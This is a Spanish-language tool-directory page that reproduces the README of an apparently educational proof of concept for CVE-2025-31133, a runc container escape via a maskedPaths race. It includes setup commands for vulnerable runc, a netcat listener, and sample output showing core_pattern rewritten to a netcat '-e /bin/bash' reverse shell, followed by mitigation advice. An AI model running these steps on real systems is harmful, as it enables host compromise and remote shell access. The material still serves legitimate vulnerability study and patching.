Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/c-h4ck-0/learn-about-cve-2025-31133-poc
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónAprendizaje y EducaciónEscape de ContenedoresLabs y Práctica
GitHubc-h4ck-0/learn-about-cve-2025-31133-poc

Learn-about-cve-2025-31133-poc

Prueba de concepto educativa para CVE-2025-31133, un escape de contenedor de runc mediante una condición de carrera en maskedPaths. Incluye configuración de laboratorio, script de explotación y guía de mitigación para investigadores de seguridad.

Ver Repositorio
236hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Aprende-sobre-cve-2025-31133-poc

Resumen

Una demostración de prueba de concepto y un entorno de aprendizaje para CVE-2025-31133, una vulnerabilidad de seguridad en runc que permite eludir la protección maskedPaths mediante una condición de carrera. Los maskedPaths están diseñados para evitar que los contenedores accedan a rutas sensibles del sistema de archivos del host.

https://github.com/user-attachments/assets/d7b4ea43-6cab-4ac5-bb07-08bc46479910

👉 Este repositorio es un ejemplo práctico de la mentalidad y las técnicas de investigación exactas que se enseñan en el entrenamiento de Black Hat:

Si esto te parece interesante, esto es solo la punta del iceberg.

Seguridad Ofensiva de Contenedores: Una Clase Magistral sobre cómo Romper los Límites

📅 Fechas del Entrenamiento Black Hat USA 2026:

1–2 de agosto

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-50910

3–4 de agosto

https://blackhat.com/us-26/training/schedule/index.html#offensive-container-security-a-masterclass-in-breaking-the-boundaries-509101770251750

Detalles de la Vulnerabilidad

  • ID de CVE: CVE-2025-31133
  • Componente: runc (runtime de contenedores)
  • Vector de Ataque: Condición de carrera en el manejo de maskedPaths
  • Impacto: Escape del contenedor

Cómo Funciona

El exploit aprovecha una condición de carrera donde:

  1. Un contenedor se configura con maskedPaths para proteger archivos sensibles (p.ej., /proc/sys/kernel/core_pattern)
  2. Durante la inicialización del contenedor, ocurre una condición de carrera entre:
    • La eliminación de un nodo de dispositivo (/dev/null) en el rootfs del contenedor
    • La recreación de ese nodo de dispositivo
  3. Esta ventana de tiempo permite eludir la protección de rutas enmascaradas
  4. Un atacante puede escribir en archivos protegidos que deberían estar enmascarados

⚠️ Aviso Legal

Este repositorio es solo para fines educativos.

  • Úselo solo en entornos aislados y controlados
  • No lo use contra sistemas que no posea o para los que no tenga permiso explícito para probar
  • El autor no es responsable por el mal uso de este código
  • Este exploit puede causar inestabilidad del sistema o pérdida de datos

Requisitos Previos

  • Sistema Linux (se recomienda Ubuntu)
  • Acceso root/sudo
  • Conexión a Internet
  • Conocimiento básico de runtimes de contenedores y seguridad

Configuración

1. Clona o Descarga Este Repositorio

root@kitploit:~
git clone https://github.com/C-h4ck-0/Learn-about-cve-2025-31133-poc.git
cd Learn-about-cve-2025-31133-poc

2. Ejecuta el Script de Configuración del Laboratorio

El script lab-setup.sh hará lo siguiente:

  • Instalar dependencias
  • Configurar una versión vulnerable de runc v1.2.0
root@kitploit:~
chmod +x lab-setup.sh
./lab-setup.sh

3. Verifica la Configuración

Verifica que la versión vulnerable de runc esté instalada:

root@kitploit:~
runc --version

Deberías ver la versión 1.2.0 o similar.

Ejecución del Exploit

Uso Básico

  1. Inicia un listener en tu máquina atacante para recibir la reverse shell:
root@kitploit:~
nc -lnvp <PORT>
  1. Ejecuta el script del exploit:
root@kitploit:~
chmod +x cve-2025-31133-exploit.sh
./cve-2025-31133-exploit.sh
  1. Proporciona la información requerida cuando se te solicite:
    • Dirección IP del atacante
    • Puerto del atacante (donde se está ejecutando tu listener)

Salida Esperada

En caso de éxito, deberías ver:

root@kitploit:~
[*] Compiling race condition exploit binary...
[*] Starting exploit attempts...
[*] Target: /proc/sys/kernel/core_pattern
[*] Backing up /proc/sys/kernel/core_pattern...
[*] Backup created at /tmp/core_pattern.bak
[*] Current content of target:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E

====================================================
[*] Testing delay: 5 microseconds
====================================================
X..
[+] ========================================
[+] SUCCESS! Exploit succeeded.
[+] ========================================
[+] Original content:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
------------------------------------------------
[+] Modified content:
|/bin/nc.traditional <ip-address> <port> -e /bin/bash
------------------------------------------------
./exploit.sh: line 148:  7068 Segmentation fault      (core dumped) sleep 5
[*] Restoring original content...
[*] Restoration complete.

Se debería establecer una conexión reverse shell a tu listener.

Mitigación

Para protegerse contra esta vulnerabilidad:

  1. Actualiza runc a una versión parcheada (v1.2.1 o posterior)
  2. Mantén los runtimes de contenedores actualizados regularmente
  3. Usa principios de mínimo privilegio - ejecuta contenedores en un espacio de nombres de usuario no root

Referencias

  • mailing archive
  • vuln poc GitHub Repository

Notas

  • El exploit puede requerir múltiples intentos para tener éxito debido a la naturaleza de la condición de carrera
  • La tasa de éxito depende de la carga del sistema y la sincronización
  • El script restaura automáticamente el core_pattern original después de una explotación exitosa
  • La limpieza se maneja automáticamente a través de los trap handlers

Licencia

Este proyecto se proporciona con fines educativos. Úselo de manera responsable y ética.


Recuerda: Siempre usa las herramientas de investigación de seguridad de manera responsable y solo en entornos que poseas o para los que tengas permiso explícito para probar.

Descargar herramienta